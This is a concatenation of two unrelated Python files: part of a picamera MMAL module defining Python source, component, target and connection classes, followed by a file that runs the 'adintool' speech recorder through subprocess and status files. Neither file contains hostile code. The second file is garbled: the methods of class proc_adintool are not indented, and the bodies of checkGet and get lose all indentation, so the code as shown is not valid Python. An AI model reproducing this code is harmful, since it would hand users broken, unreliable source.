            self._outputs[0].close()
            self._outputs = ()
        if self._stream:
            # Only closes the stream if we opened it (see open_stream)
            close_stream(self._stream, self._opened)
            self._stream = None
    def enable(self):
        # Start the background thread that pumps the input stream into
        # output buffers; daemon so it cannot block interpreter exit
        super(MMALPythonSource, self).enable()
        self._thread = Thread(target=self._send_run)
        self._thread.daemon = True
        self._thread.start()
    def disable(self):
        # Clearing enabled (in the superclass) terminates _send_run's loop;
        # wait for the thread to notice and exit
        super(MMALPythonSource, self).disable()
        if self._thread:
            self._thread.join()
            self._thread = None
    def wait(self, timeout=None):
        """
        Wait for the source to send all bytes from the specified input. If
        *timeout* is specified, it is the number of seconds to wait for
        completion. The method returns ``True`` if the source completed within
        the specified timeout and ``False`` otherwise.
        """
        if not self.enabled:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, 'cannot wait on disabled component')
        self._thread.join(timeout)
        return not self._thread.is_alive()
    def _send_run(self):
        # Calculate the size of a frame if possible (i.e. when the output
        # format is an unencoded full frame format). If it's an unknown /
        # encoded format, we've no idea what the framesize is (this would
        # presumably require decoding the stream) so leave framesize as None.
        video = self._outputs[0]._format[0].es[0].video
        try:
            framesize = (
                MMALPythonPort._FORMAT_BPP[str(self._outputs[0].format)]
                * video.width
                * video.height)
        except KeyError:
            framesize = None
        # frameleft counts down the bytes remaining in the current frame
        # (None when the frame size is unknown)
        frameleft = framesize
        while self.enabled:
            # Short timeout so the loop re-checks self.enabled regularly
            buf = self._outputs[0].get_buffer(timeout=0.1)
            if buf:
                try:
                    if frameleft is None:
                        send = buf.size
                    else:
                        send = min(frameleft, buf.size)
                    with buf as data:
                        if send == buf.size:
                            try:
                                # readinto() is by far the fastest method of
                                # getting data into the buffer
                                buf.length = self._stream.readinto(data)
                            except AttributeError:
                                # if there's no readinto() method, fallback on
                                # read() and the data setter (memmove)
                                buf.data = self._stream.read(buf.size)
                        else:
                            buf.data = self._stream.read(send)
                    if frameleft is not None:
                        frameleft -= buf.length
                        if not frameleft:
                            # Completed a frame; flag it and start counting
                            # down the next one
                            buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END
                            frameleft = framesize
                    if not buf.length:
                        # Input exhausted; emit an empty EOS buffer and stop
                        buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_EOS
                        break
                finally:
                    # Always forward the buffer, even on error / EOS
                    self._outputs[0].send_buffer(buf)
    @property
    def name(self):
        return 'py.source'
class MMALPythonComponent(MMALPythonBaseComponent):
    """
    Provides a Python-based MMAL component with a *name*, a single input and
    the specified number of *outputs* (default 1). The :meth:`connect` and
    :meth:`disconnect` methods can be used to establish or break a connection
    from the input port to an upstream component.

    Typically descendents will override the :meth:`_handle_frame` method to
    respond to buffers sent to the input port, and will set
    :attr:`MMALPythonPort.supported_formats` in the constructor to define the
    formats that the component will work with.
    """
    __slots__ = ('_name', '_thread', '_queue', '_error')
    def __init__(self, name='py.component', outputs=1):
        super(MMALPythonComponent, self).__init__()
        self._name = name
        self._thread = None
        # Holds the exception (if any) raised by the background thread, so
        # disable() can re-raise it on the caller's thread
        self._error = None
        self._queue = MMALQueue.create()
        self._inputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_INPUT, 0),)
        self._outputs = tuple(
            MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, n)
            for n in range(outputs)
            )
    def close(self):
        super(MMALPythonComponent, self).close()
        self.disconnect()
        if self._inputs:
            self._inputs[0].close()
            self._inputs = ()
        for output in self._outputs:
            output.disable()
        self._outputs = ()
        self._queue.close()
        self._queue = None
    def connect(self, source, **options):
        """
        Connects the input port of this component to the specified *source*
        :class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
        convenience (primarily intended for command line experimentation; don't
        use this in scripts), *source* can be another component in which case
        the first unconnected output port will be selected as *source*.

        Keyword arguments will be passed along to the connection constructor.
        See :class:`MMALConnection` and :class:`MMALPythonConnection` for
        further information.
        """
        if isinstance(source, (MMALPort, MMALPythonPort)):
            # NOTE(review): **options are not forwarded in this branch,
            # unlike the component branch below — confirm whether intentional
            return self.inputs[0].connect(source)
        else:
            for port in source.outputs:
                if not port.connection:
                    return self.inputs[0].connect(port, **options)
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
    def disconnect(self):
        """
        Destroy the connection between this component's input port and the
        upstream component.
        """
        self.inputs[0].disconnect()
    @property
    def connection(self):
        """
        The :class:`MMALConnection` or :class:`MMALPythonConnection` object
        linking this component to the upstream component.
        """
        return self.inputs[0].connection
    @property
    def name(self):
        return self._name
    def _commit_port(self, port):
        """
        Overridden to to copy the input port's configuration to the output
        port(s), and to ensure that the output port(s)' format(s) match
        the input port's format.
        """
        super(MMALPythonComponent, self)._commit_port(port)
        if port.type == mmal.MMAL_PORT_TYPE_INPUT:
            for output in self.outputs:
                output.copy_from(port)
        elif port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
            if port.format != self.inputs[0].format:
                raise PiCameraMMALError(mmal.MMAL_EINVAL, 'output format mismatch')
    def enable(self):
        super(MMALPythonComponent, self).enable()
        if not self._thread:
            # Daemon thread so a forgotten component cannot block exit
            self._thread = Thread(target=self._thread_run)
            self._thread.daemon = True
            self._thread.start()
    def disable(self):
        super(MMALPythonComponent, self).disable()
        if self._thread:
            self._thread.join()
            self._thread = None
            # Re-raise any exception the background thread captured
            if self._error:
                raise self._error
    def _thread_run(self):
        try:
            while self._enabled:
                # Short timeout so the loop re-checks self._enabled regularly
                buf = self._queue.get(timeout=0.1)
                if buf:
                    try:
                        # Dispatch on the buffer's command: 0 means ordinary
                        # frame data, otherwise it's an MMAL event
                        handler = {
                            0:                                  self._handle_frame,
                            mmal.MMAL_EVENT_PARAMETER_CHANGED:  self._handle_parameter_changed,
                            mmal.MMAL_EVENT_FORMAT_CHANGED:     self._handle_format_changed,
                            mmal.MMAL_EVENT_ERROR:              self._handle_error,
                            mmal.MMAL_EVENT_EOS:                self._handle_end_of_stream,
                            }[buf.command]
                        # A truthy handler result means "no more buffers
                        # expected"; stop processing
                        if handler(self.inputs[0], buf):
                            self._enabled = False
                    finally:
                        buf.release()
        except Exception as e:
            # Stash the exception for disable() to re-raise on the caller's
            # thread
            self._error = e
            self._enabled = False
    def _handle_frame(self, port, buf):
        """
        Handles frame data buffers (where :attr:`MMALBuffer.command` is set to
        0).

        Typically, if the component has output ports, the method is expected to
        fetch a buffer from the output port(s), write data into them, and send
        them back to their respective ports.

        Return values are as for normal event handlers (``True`` when no more
        buffers are expected, ``False`` otherwise).
        """
        return False
    def _handle_format_changed(self, port, buf):
        """
        Handles format change events passed to the component (where
        :attr:`MMALBuffer.command` is set to MMAL_EVENT_FORMAT_CHANGED).

        The default implementation re-configures the input port of the
        component and emits the event on all output ports for downstream
        processing. Override this method if you wish to do something else in
        response to format change events.

        The *port* parameter is the port into which the event arrived, and
        *buf* contains the event itself (a MMAL_EVENT_FORMAT_CHANGED_T
        structure). Use ``mmal_event_format_changed_get`` on the buffer's data
        to extract the event.
        """
        # The with-block maps the buffer so the event structure can be read
        with buf as data:
            event = mmal.mmal_event_format_changed_get(buf._buf)
            if port.connection:
                # Handle format change on the source output port, if any. We
                # don't check the output port capabilities because it was the
                # port that emitted the format change in the first case so it'd
                # be odd if it didn't support them (or the format requested)!
                output = port.connection._source
                output.disable()
                if isinstance(output, MMALPythonPort):
                    mmal.mmal_format_copy(output._format, event[0].format)
                else:
                    mmal.mmal_format_copy(output._port[0].format, event[0].format)
                output.commit()
                # Prefer the recommended buffer count/size, falling back on
                # the minimum when no recommendation is given
                output.buffer_count = (
                    event[0].buffer_num_recommended
                    if event[0].buffer_num_recommended > 0 else
                    event[0].buffer_num_min)
                output.buffer_size = (
                    event[0].buffer_size_recommended
                    if event[0].buffer_size_recommended > 0 else
                    event[0].buffer_size_min)
                if isinstance(output, MMALPythonPort):
                    output.enable()
                else:
                    output.enable(port.connection._transfer)
            # Now deal with the format change on this input port (this is only
            # called from _thread_run so port must be an input port)
            try:
                if not (port.capabilities & mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE):
                    raise PiCameraMMALError(
                        mmal.MMAL_EINVAL,
                        'port %s does not support event change' % self.name)
                mmal.mmal_format_copy(port._format, event[0].format)
                self._commit_port(port)
                port.pool.resize(
                    event[0].buffer_num_recommended
                    if event[0].buffer_num_recommended > 0 else
                    event[0].buffer_num_min,
                    event[0].buffer_size_recommended
                    if event[0].buffer_size_recommended > 0 else
                    event[0].buffer_size_min)
                port.buffer_count = len(port.pool)
                port.buffer_size = port.pool[0].size
            except:
                # If this port can't handle the format change, or if anything goes
                # wrong (like the owning component doesn't like the new format)
                # stop the pipeline (from here at least)
                if port.connection:
                    port.connection.disable()
                raise
        # Chain the format-change onward so everything downstream sees it.
        # NOTE: the callback isn't given the format-change because there's no
        # image data in it
        for output in self.outputs:
            out_buf = output.get_buffer()
            out_buf.copy_from(buf)
            output.send_buffer(out_buf)
        return False
    def _handle_parameter_changed(self, port, buf):
        """
        Handles parameter change events passed to the component (where
        :attr:`MMALBuffer.command` is set to MMAL_EVENT_PARAMETER_CHANGED).

        The default implementation does nothing but return ``False``
        (indicating that processing should continue). Override this in
        descendents to respond to parameter changes.

        The *port* parameter is the port into which the event arrived, and
        *buf* contains the event itself (a MMAL_EVENT_PARAMETER_CHANGED_T
        structure).
        """
        return False
    def _handle_error(self, port, buf):
        """
        Handles error notifications passed to the component (where
        :attr:`MMALBuffer.command` is set to MMAL_EVENT_ERROR).

        The default implementation does nothing but return ``True`` (indicating
        that processing should halt). Override this in descendents to respond
        to error events.

        The *port* parameter is the port into which the event arrived.
        """
        return True
    def _handle_end_of_stream(self, port, buf):
        """
        Handles end-of-stream notifications passed to the component (where
        :attr:`MMALBuffer.command` is set to MMAL_EVENT_EOS).

        The default implementation does nothing but return ``True`` (indicating
        that processing should halt). Override this in descendents to respond
        to the end of stream.

        The *port* parameter is the port into which the event arrived.
        """
        return True
class MMALPythonTarget(MMALPythonComponent):
    """
    A simple sink component that writes every buffer it receives to the
    specified *output* until a frame carrying the *done* flag is seen
    (defaults to MMAL_BUFFER_HEADER_FLAG_EOS, indicating End Of Stream).

    The component provides all picamera's usual IO-handling characteristics;
    if *output* is a string, a file with that name will be opened as the
    output and closed implicitly when the component is closed. Otherwise, the
    output will not be closed implicitly (the component did not open it, so
    the assumption is that closing *output* is the caller's responsibility).
    If *output* is an object with a ``write`` method it is assumed to be a
    file-like object and is used as is. Otherwise, *output* is assumed to be
    a writeable object supporting the buffer protocol (which is wrapped in a
    :class:`BufferIO` stream).
    """
    __slots__ = ('_opened', '_stream', '_done', '_event')

    def __init__(self, output, done=mmal.MMAL_BUFFER_HEADER_FLAG_EOS):
        super(MMALPythonTarget, self).__init__(name='py.target', outputs=0)
        self._stream, self._opened = open_stream(output)
        self._done = done
        self._event = Event()
        # Accept all the formats picamera generally produces (users can add
        # other esoteric stuff to this set if they need to)
        accepted = {
            mmal.MMAL_ENCODING_MJPEG,
            mmal.MMAL_ENCODING_H264,
            mmal.MMAL_ENCODING_JPEG,
            mmal.MMAL_ENCODING_GIF,
            mmal.MMAL_ENCODING_PNG,
            mmal.MMAL_ENCODING_BMP,
            mmal.MMAL_ENCODING_I420,
            mmal.MMAL_ENCODING_RGB24,
            mmal.MMAL_ENCODING_BGR24,
            mmal.MMAL_ENCODING_RGBA,
            mmal.MMAL_ENCODING_BGRA,
            }
        self.inputs[0].supported_formats = accepted

    def close(self):
        super(MMALPythonTarget, self).close()
        # Only closes the stream if we opened it (see open_stream)
        close_stream(self._stream, self._opened)

    def enable(self):
        # Reset the completion event before processing (re-)starts
        self._event.clear()
        super(MMALPythonTarget, self).enable()

    def wait(self, timeout=None):
        """
        Wait for the output to be "complete" as defined by the constructor's
        *done* parameter. If *timeout* is specified it is the number of
        seconds to wait for completion. The method returns ``True`` if the
        target completed within the specified timeout and ``False``
        otherwise.
        """
        return self._event.wait(timeout)

    def _handle_frame(self, port, buf):
        # Dump the payload, then halt (returning True) once a buffer
        # carrying the "done" flag arrives
        self._stream.write(buf.data)
        finished = bool(buf.flags & self._done)
        if finished:
            self._event.set()
        return finished
class MMALPythonConnection(MMALBaseConnection):
    """
    Represents a connection between an :class:`MMALPythonBaseComponent` and a
    :class:`MMALBaseComponent` or another :class:`MMALPythonBaseComponent`.
    The constructor accepts arguments providing the *source* :class:`MMALPort`
    (or :class:`MMALPythonPort`) and *target* :class:`MMALPort` (or
    :class:`MMALPythonPort`).

    The *formats* parameter specifies an iterable of formats (in preference
    order) that the connection may attempt when negotiating formats between
    the two ports. If this is ``None``, or an empty iterable, no negotiation
    will take place and the source port's format will simply be copied to the
    target port. Otherwise, the iterable will be worked through in order until
    a format acceptable to both ports is discovered.

    The *callback* parameter can optionally specify a callable which will be
    executed for each buffer that traverses the connection (providing an
    opportunity to manipulate or drop that buffer). If specified, it must be a
    callable which accepts two parameters: the :class:`MMALPythonConnection`
    object sending the data, and the :class:`MMALBuffer` object containing
    data. The callable may optionally manipulate the :class:`MMALBuffer` and
    return it to permit it to continue traversing the connection, or return
    ``None`` in which case the buffer will be released.

    .. data:: default_formats
        :annotation: = (MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)

        Class attribute defining the default formats used to negotiate
        connections between Python and MMAL components, in preference
        order. Note that OPAQUE is not present in contrast with the default
        formats in :class:`MMALConnection`.
    """
    __slots__ = ('_enabled', '_callback')

    default_formats = (
        mmal.MMAL_ENCODING_I420,
        mmal.MMAL_ENCODING_RGB24,
        mmal.MMAL_ENCODING_BGR24,
        mmal.MMAL_ENCODING_RGBA,
        mmal.MMAL_ENCODING_BGRA,
        )

    def __init__(
            self, source, target, formats=default_formats, callback=None):
        # At least one end must be a Python port; two real MMAL ports should
        # use a native MMAL connection instead
        if not (
                isinstance(source, MMALPythonPort) or
                isinstance(target, MMALPythonPort)
                ):
            raise PiCameraValueError('use a real MMAL connection')
        super(MMALPythonConnection, self).__init__(source, target, formats)
        self._enabled = False
        self._callback = callback

    def close(self):
        # Disable before tearing down the underlying connection state
        self.disable()
        super(MMALPythonConnection, self).close()

    @property
    def enabled(self):
        """
        Returns ``True`` if the connection is enabled. Use :meth:`enable`
        and :meth:`disable` to control the state of the connection.
        """
        return self._enabled

    def enable(self):
        """
        Enable the connection. When a connection is enabled, data is
        continually transferred from the output port of the source to the input
        port of the target component.
        """
        if not self._enabled:
            self._enabled = True
            if isinstance(self._target, MMALPythonPort):
                # Connected python input ports require no callback
                self._target.enable()
            else:
                # Connected MMAL input ports don't know they're connected so
                # provide a dummy callback
                self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
                self._target.enable(lambda port, buf: True)
            if isinstance(self._source, MMALPythonPort):
                # Connected python output ports are nothing more than thin
                # proxies for the target input port; no callback required
                self._source.enable()
            else:
                # Connected MMAL output ports are made to transfer their
                # data to the Python input port
                self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
                self._source.enable(self._transfer)

    def disable(self):
        """
        Disables the connection.
        """
        self._enabled = False
        self._source.disable()
        self._target.disable()

    def _transfer(self, port, buf):
        # Callback for a real MMAL source port: copy each buffer into a
        # buffer obtained from the (Python) target port and send it on.
        # Retries get_buffer until one is available or the connection is
        # disabled; a disabled target port simply drops the data.
        while self._enabled:
            try:
                dest = self._target.get_buffer(timeout=0.01)
            except PiCameraPortDisabled:
                dest = None
            if dest:
                dest.copy_from(buf)
                try:
                    self._target.send_buffer(dest)
                except PiCameraPortDisabled:
                    pass
                return False
        return False

    @property
    def name(self):
        return '%s/%s' % (self._source.name, self._target.name)

    def __repr__(self):
        try:
            return '<MMALPythonConnection "%s">' % self.name
        except NameError:
            # NOTE(review): NameError looks odd here — a missing _source
            # attribute after close() would raise AttributeError; confirm
            # which exception a closed connection actually produces.
            return '<MMALPythonConnection closed>'
|
_v5_proc_adintool.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# COPYRIGHT (C) 2014-2020 Mitsuo KONDOU.
# This software is released under the MIT License.
# https://github.com/konsan1101
# Thank you for keeping the rules.
import sys
import os
import time
import datetime
import codecs
import glob
import queue
import threading
import subprocess
# Interface file: control file polled for speech-process commands
qCtrl_control_speech = 'temp/control_speech.txt'

# qLog, qFunc: shared utility routines
import _v5__qLog
qLog = _v5__qLog.qLog_class()
import _v5__qFunc
qFunc = _v5__qFunc.qFunc_class()

# Environment / path / status-file settings pulled from the shared config.
# qPath_* are directories, qBusy_* and qRdy__* are status-flag file paths.
qPLATFORM = qFunc.getValue('qPLATFORM')
qRUNATTR = qFunc.getValue('qRUNATTR')
qHOSTNAME = qFunc.getValue('qHOSTNAME')
qUSERNAME = qFunc.getValue('qUSERNAME')
qPath_pictures = qFunc.getValue('qPath_pictures')
qPath_videos = qFunc.getValue('qPath_videos')
qPath_cache = qFunc.getValue('qPath_cache')
qPath_sounds = qFunc.getValue('qPath_sounds')
qPath_icons = qFunc.getValue('qPath_icons')
qPath_fonts = qFunc.getValue('qPath_fonts')
qPath_log = qFunc.getValue('qPath_log')
qPath_work = qFunc.getValue('qPath_work')
qPath_rec = qFunc.getValue('qPath_rec')
qPath_s_ctrl = qFunc.getValue('qPath_s_ctrl')
qPath_s_inp = qFunc.getValue('qPath_s_inp')
qPath_s_wav = qFunc.getValue('qPath_s_wav')
qPath_s_jul = qFunc.getValue('qPath_s_jul')
qPath_s_STT = qFunc.getValue('qPath_s_STT')
qPath_s_TTS = qFunc.getValue('qPath_s_TTS')
qPath_s_TRA = qFunc.getValue('qPath_s_TRA')
qPath_s_play = qFunc.getValue('qPath_s_play')
qPath_v_ctrl = qFunc.getValue('qPath_v_ctrl')
qPath_v_inp = qFunc.getValue('qPath_v_inp')
qPath_v_jpg = qFunc.getValue('qPath_v_jpg')
qPath_v_detect = qFunc.getValue('qPath_v_detect')
qPath_v_cv = qFunc.getValue('qPath_v_cv')
qPath_v_photo = qFunc.getValue('qPath_v_photo')
qPath_v_msg = qFunc.getValue('qPath_v_msg')
qPath_d_ctrl = qFunc.getValue('qPath_d_ctrl')
qPath_d_play = qFunc.getValue('qPath_d_play')
qPath_d_prtscn = qFunc.getValue('qPath_d_prtscn')
qPath_d_movie = qFunc.getValue('qPath_d_movie')
qPath_d_upload = qFunc.getValue('qPath_d_upload')
qBusy_dev_cpu = qFunc.getValue('qBusy_dev_cpu')
qBusy_dev_com = qFunc.getValue('qBusy_dev_com')
qBusy_dev_mic = qFunc.getValue('qBusy_dev_mic')
qBusy_dev_spk = qFunc.getValue('qBusy_dev_spk')
qBusy_dev_cam = qFunc.getValue('qBusy_dev_cam')
qBusy_dev_dsp = qFunc.getValue('qBusy_dev_dsp')
qBusy_dev_scn = qFunc.getValue('qBusy_dev_scn')
qBusy_s_ctrl = qFunc.getValue('qBusy_s_ctrl')
qBusy_s_inp = qFunc.getValue('qBusy_s_inp')
qBusy_s_wav = qFunc.getValue('qBusy_s_wav')
qBusy_s_STT = qFunc.getValue('qBusy_s_STT')
qBusy_s_TTS = qFunc.getValue('qBusy_s_TTS')
qBusy_s_TRA = qFunc.getValue('qBusy_s_TRA')
qBusy_s_play = qFunc.getValue('qBusy_s_play')
qBusy_v_ctrl = qFunc.getValue('qBusy_v_ctrl')
qBusy_v_inp = qFunc.getValue('qBusy_v_inp')
qBusy_v_QR = qFunc.getValue('qBusy_v_QR')
qBusy_v_jpg = qFunc.getValue('qBusy_v_jpg')
qBusy_v_CV = qFunc.getValue('qBusy_v_CV')
qBusy_d_ctrl = qFunc.getValue('qBusy_d_ctrl')
qBusy_d_inp = qFunc.getValue('qBusy_d_inp')
qBusy_d_QR = qFunc.getValue('qBusy_d_QR')
qBusy_d_rec = qFunc.getValue('qBusy_d_rec')
qBusy_d_play = qFunc.getValue('qBusy_d_play')
qBusy_d_browser = qFunc.getValue('qBusy_d_browser')
qBusy_d_upload = qFunc.getValue('qBusy_d_upload')
qRdy__s_force = qFunc.getValue('qRdy__s_force')
qRdy__s_fproc = qFunc.getValue('qRdy__s_fproc')
qRdy__s_sendkey = qFunc.getValue('qRdy__s_sendkey')
qRdy__v_reader = qFunc.getValue('qRdy__v_reader')
qRdy__v_sendkey = qFunc.getValue('qRdy__v_sendkey')
qRdy__d_reader = qFunc.getValue('qRdy__d_reader')
qRdy__d_sendkey = qFunc.getValue('qRdy__d_sendkey')
class proc_adintool:
def __init__(self, name='thread', id='0', runMode='debug',
             micDev='0', micType='bluetooth', micGuide='sound', micLevel='777', ):
    """Set up microphone configuration and (idle) worker-thread state."""
    # Microphone / runtime configuration
    self.path = qPath_s_inp
    self.runMode = runMode
    self.micDev = micDev
    self.micType = micType
    self.micGuide = micGuide
    self.micLevel = micLevel

    # Stop-request flag polled by the worker loop
    self.breakFlag = threading.Event()
    self.breakFlag.clear()

    self.name = name
    self.id = id
    # Fixed-width process id such as 'adintool__0'
    padded = '{0:10s}'.format(name).replace(' ', '_')
    self.proc_id = padded[:-2] + '_' + str(id)

    # Echo log records to the console only in debug mode
    self.logDisp = (runMode == 'debug')
    qLog.log('info', self.proc_id, 'init', display=self.logDisp, )

    # Worker-thread state; populated by begin()
    self.proc_s = None
    self.proc_r = None
    self.proc_main = None
    self.proc_beat = None
    self.proc_last = None
    self.proc_step = '0'
    self.proc_seq = 0
def __del__(self, ):
    # Best-effort farewell log on garbage collection
    qLog.log('info', self.proc_id, 'bye!', display=self.logDisp, )
def begin(self, ):
    """
    Start the background worker thread.

    Creates the run/ready/busy status files (all cleared), the send and
    receive queues, and launches :meth:`main_proc` as a daemon thread.
    """
    #qLog.log('info', self.proc_id, 'start')

    # Status files used to publish this worker's state to other processes
    self.fileRun = qPath_work + self.proc_id + '.run'
    self.fileRdy = qPath_work + self.proc_id + '.rdy'
    self.fileBsy = qPath_work + self.proc_id + '.bsy'
    qFunc.statusSet(self.fileRun, False)
    qFunc.statusSet(self.fileRdy, False)
    qFunc.statusSet(self.fileBsy, False)

    self.proc_s = queue.Queue()
    self.proc_r = queue.Queue()
    self.proc_main = threading.Thread(target=self.main_proc, args=(self.proc_s, self.proc_r, ))
    self.proc_beat = time.time()
    self.proc_last = time.time()
    self.proc_step = '0'
    self.proc_seq = 0
    # daemon=True so the worker cannot keep the interpreter alive.
    # (Fix: Thread.setDaemon() is deprecated since Python 3.10; use the
    # daemon attribute instead.)
    self.proc_main.daemon = True
    self.proc_main.start()
def abort(self, waitMax=5, ):
    """Request the worker to stop, then wait (up to *waitMax* seconds, twice)
    for its heartbeat to clear and its run-status file to disappear."""
    qLog.log('info', self.proc_id, 'stop', display=self.logDisp, )
    self.breakFlag.set()
    # Phase 1: wait for the worker loop to clear its heartbeat
    deadline = time.time() + waitMax
    while self.proc_beat is not None and time.time() < deadline:
        time.sleep(0.25)
    # Phase 2: wait for the run-status file to be removed
    deadline = time.time() + waitMax
    while os.path.exists(self.fileRun) and time.time() < deadline:
        time.sleep(0.25)
def put(self, data, ):
    # Queue a [name, value] request for the worker thread; always True
    self.proc_s.put(data)
    return True
def checkGet(self, waitMax=5, ):
chktime = time.time()
while (self.proc_r.qsize() == 0) and ((time.time() - chktime) < waitMax):
time.sleep(0.10)
data = self.get()
return data
def get(self, ):
if (self.proc_r.qsize() == 0):
return ['', '']
data = self.proc_r.get()
self.proc_r.task_done()
return data
def main_proc(self, cn_r, cn_s, ):
    """
    Worker loop: manages the external 'adintool' recorder process.

    cn_r: queue of incoming [name, value] requests (e.g. '_status_').
    cn_s: queue of outgoing [name, value] replies.
    Runs until breakFlag is set; publishes state via the run/rdy/bsy files.
    """
    # Log
    qLog.log('info', self.proc_id, 'start', display=self.logDisp, )
    qFunc.statusSet(self.fileRun, True)
    self.proc_beat = time.time()

    # Initial settings
    self.proc_step = '1'

    # adintool tuning values (milliseconds / levels as strings for argv)
    adin_rewind = '555'
    adin_headmg = '333'
    adin_tailmg = '444'
    vadLevel = '1'
    if (self.micLevel == '1'):
        vadLevel = '3'

    # Handles for the recorder and its optional GUI subprocesses
    adintool_exe = None
    adintool_gui = None

    # Guide sound (start-up chime)
    if (self.micGuide != 'off'):
        qFunc.guideSound('_up')

    # Main wait loop
    self.proc_step = '5'

    while (self.proc_step == '5'):
        self.proc_beat = time.time()

        # Check for a stop request
        if (self.breakFlag.is_set()):
            self.breakFlag.clear()
            self.proc_step = '9'
            break

        # Fetch one request from the inbound queue (if any)
        if (cn_r.qsize() > 0):
            cn_r_get = cn_r.get()
            inp_name = cn_r_get[0]
            inp_value = cn_r_get[1]
            cn_r.task_done()
        else:
            inp_name = ''
            inp_value = ''

        if (cn_r.qsize() > 1) or (cn_s.qsize() > 20):
            qLog.log('warning', self.proc_id, 'queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))

        # Publish ready status
        if (qFunc.statusCheck(self.fileRdy) == False):
            qFunc.statusSet(self.fileRdy, True)

        # Status reply: '_ready_' when recorder is idle, '_busy_' when
        # capture files are pending, '!ready' when recorder is not running
        if (inp_name.lower() == '_status_'):
            out_name = inp_name
            out_value = '!ready'
            if (not adintool_exe is None):
                files = glob.glob(self.path + '*')
                if (len(files) == 0):
                    out_value = '_ready_'
                else:
                    out_value = '_busy_'
            cn_s.put([out_name, out_value])

        # Processing

        # Should the recorder be on?
        sw = 'off'
        if (qFunc.statusCheck(qBusy_dev_mic) == False):
            if (self.micDev.isdigit()):
                if (self.micType == 'usb'):
                    sw = 'on'
                else:
                    # Non-USB (e.g. bluetooth) mics: only record while the
                    # whole speech pipeline is idle
                    if (qFunc.statusWait_false(qBusy_s_ctrl, 1) == False) \
                    and (qFunc.statusWait_false(qBusy_s_wav, 1) == False) \
                    and (qFunc.statusWait_false(qBusy_s_STT, 1) == False) \
                    and (qFunc.statusWait_false(qBusy_s_TTS, 1) == False) \
                    and (qFunc.statusWait_false(qBusy_s_TRA, 1) == False) \
                    and (qFunc.statusWait_false(qBusy_s_play, 1) == False):
                        sw = 'on'

        # Transition off -> on: launch adintool (and optionally its GUI)
        if (sw == 'on'):
            if (adintool_exe is None):

                # Execution counter
                self.proc_last = time.time()
                self.proc_seq += 1
                if (self.proc_seq > 9999):
                    self.proc_seq = 1

                # Set busy status (ready to capture)
                if (qFunc.statusCheck(self.fileBsy) == False):
                    qFunc.statusSet(self.fileBsy, True)
                    if (str(self.id) == '0'):
                        qFunc.statusSet(qBusy_s_inp, True)

                    # Guide sound
                    if (self.micGuide == 'on' or self.micGuide == 'sound') \
                    or (qFunc.statusCheck(qRdy__s_force) == True):
                        qFunc.guideSound('_ready')

                if (True):
                    nowTime = datetime.datetime.now()
                    filename = self.path + nowTime.strftime('%Y%m%d.%H%M%S') +'.adintool'
                    adintool_exe = subprocess.Popen(['adintool', '-in', 'mic', \
                        '-rewind', adin_rewind, '-headmargin', adin_headmg, '-tailmargin', adin_tailmg, \
                        '-fvad', vadLevel, '-lv', self.micLevel, \
                        '-out', 'file', '-filename', filename, '-startid', '5001', ] , \
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE, )

            # GUI monitor (Windows only)
            if (adintool_gui is None) and (os.name == 'nt'):
                if (self.micGuide == 'on') or (self.micGuide == 'display') \
                or (qFunc.statusCheck(qRdy__s_force) == True):
                    adintool_gui = subprocess.Popen(['adintool-gui', '-in', 'mic', \
                        '-rewind', adin_rewind, '-headmargin', adin_headmg, '-tailmargin', adin_tailmg, \
                        '-lv', self.micLevel,] , \
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE, )

            # Force-mode ended: drop the GUI if it is no longer wanted
            if (not adintool_gui is None):
                if (self.micGuide != 'on') and (self.micGuide != 'display') \
                and (qFunc.statusCheck(qRdy__s_force) != True):
                    adintool_gui.terminate()
                    adintool_gui = None

        # Should the recorder turn off, or has a capture been accepted?
        sw = 'on'
        if (qFunc.statusCheck(qBusy_dev_mic) == True):
            sw = 'off'
        if (self.micType == 'bluetooth'):
            if (qFunc.statusCheck(qBusy_s_play) == True):
                sw = 'off'
        if (not adintool_exe is None):
            files = glob.glob(self.path + '*')
            if (len(files) > 0):
                # Wait (max 2s) for the capture files to be consumed
                chktime = time.time()
                while (len(files) > 0) and ((time.time() - chktime) < 2):
                    time.sleep(0.20)
                    files = glob.glob(self.path + '*')
                if (len(files) == 0):
                    sw = 'accept'

        # Transition on -> off / accept
        if (sw == 'off') or (sw == 'accept'):

            # Terminate the adintool GUI
            if (not adintool_gui is None):
                adintool_gui.terminate()
                adintool_gui = None

            if (self.micType == 'bluetooth'):
                # Terminate the adintool recorder
                if (not adintool_exe is None):
                    adintool_exe.terminate()
                    adintool_exe = None

                # Clear busy status (!ready)
                qFunc.statusSet(self.fileBsy, False)
                if (str(self.id) == '0'):
                    qFunc.statusSet(qBusy_s_inp, False)

                # Guide sound
                time.sleep(0.50)
                if (sw == 'accept'):
                    if (self.micGuide == 'on') or (self.micGuide == 'sound') \
                    or (qFunc.statusCheck(qRdy__s_force) == True):
                        qFunc.guideSound('_accept')

                # Force-mode end
                if (qFunc.statusCheck(qRdy__s_force) == True):
                    qFunc.statusSet(qRdy__s_force, False)

                time.sleep(0.50)

        # Idling: slow the loop when the host or mic is busy
        slow = False
        if (qFunc.statusCheck(qBusy_dev_cpu) == True):
            slow = True
        elif (qFunc.statusCheck(qBusy_dev_mic) == True) \
        and (qFunc.statusCheck(qRdy__s_force) == False) \
        and (qFunc.statusCheck(qRdy__s_sendkey) == False):
            slow = True
        if (slow == True):
            time.sleep(1.00)
        else:
            if (cn_r.qsize() == 0):
                time.sleep(0.25)
            else:
                time.sleep(0.05)

    # Shutdown
    if (True):

        # Clear ready status
        qFunc.statusSet(self.fileRdy, False)

